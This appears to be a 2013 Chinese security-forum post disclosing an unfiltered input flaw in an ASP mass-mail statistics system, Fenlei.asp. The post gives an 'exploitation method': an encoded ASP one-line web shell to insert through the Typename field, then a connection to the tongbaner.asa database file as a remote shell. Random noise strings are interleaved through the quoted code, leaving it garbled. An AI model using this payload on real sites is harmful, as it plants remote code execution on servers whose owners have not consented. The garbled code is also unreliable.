找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1945|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
'Fenlei.asp
4 ^6 J+ v1 ~+ L* M
& T3 s4 _; `$ b) F' P7 n5 B8 L0 RIF Request.QueryString("Action")="del" Then / Z8 H# W' a& J- s4 a, v  U3 i
ID=Request.QueryString("ID")
( R2 N! b2 o- \IF Countss ("tui","Fenlei",ID )<>0 then
% V6 q) M/ O7 v$ }- U'略 1 }- d  g9 S' f' c, l5 z" G$ A
IF Request.QueryString("Action")="Add" Then
, F2 `2 |& N9 y' B$ b( dTname=Request.Form("Typename")   G) X+ m+ D8 m2 W
Set Rs=Server.CreateObject("adodb.Recordset") 0 Z, z: ]/ [- {# d- g6 \! a( ]
Sql="Select * From Fenlei Order by id Desc "
" ]3 T* f: R8 ^! CRs.Open Sql,Conn,1,3
3 m) ^: |; b# @1 _9 C+ b* lRs.Addnew ! \6 n, x8 |0 C; @( s; \
Rs("Typename")=Tname
7 ~2 c% l& e6 E5 P'略
3 H; m3 o# X8 }Set Rs=Server.CreateObject("adodb.Recordset")
5 N2 R3 Z$ w, \! Q( JSql="Select * From Fenlei Order by id Desc " 3 x4 F# v( a6 l
Rs.Open Sql,Conn,1,1 - Z, q- |* \6 \* D& T' ?) U
'略
% O  K1 m" p6 s& k8 I- A3 Z%>1 J) x# l+ W3 K0 L7 ?
3 |6 T2 o& Y) A1 j5 X' t, R
! _* A; L! g0 q* \( G8 y
* L) S8 c2 o, }+ l) K7 b; g
没有过滤,直接写入数据库。
( z3 d/ d  `/ b) v- ^7 W0 P) { 3 k0 Y2 W( N  S6 I% N7 @% q& ]% S
利用方法:
5 j5 X1 _3 `5 ~* A! Y2 F0 U 7 Z% q; k1 F, d# C" l" ]7 I
插入:┼攠數畣整爠煥敵瑳∨≡┩>
& G; I3 {5 {2 c, U + K' n3 _3 ?9 R, B% Q5 a& Z

9 V# |& i9 s. c, G连接: http://www.xxx.com/###tongbaner.asa % f/ t' h6 A1 z, [
'默认安装文件: 5 T# F  n+ o( Y% B% L) t
'install.asp
) p& A2 e6 \) B7 U* ?8 n
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表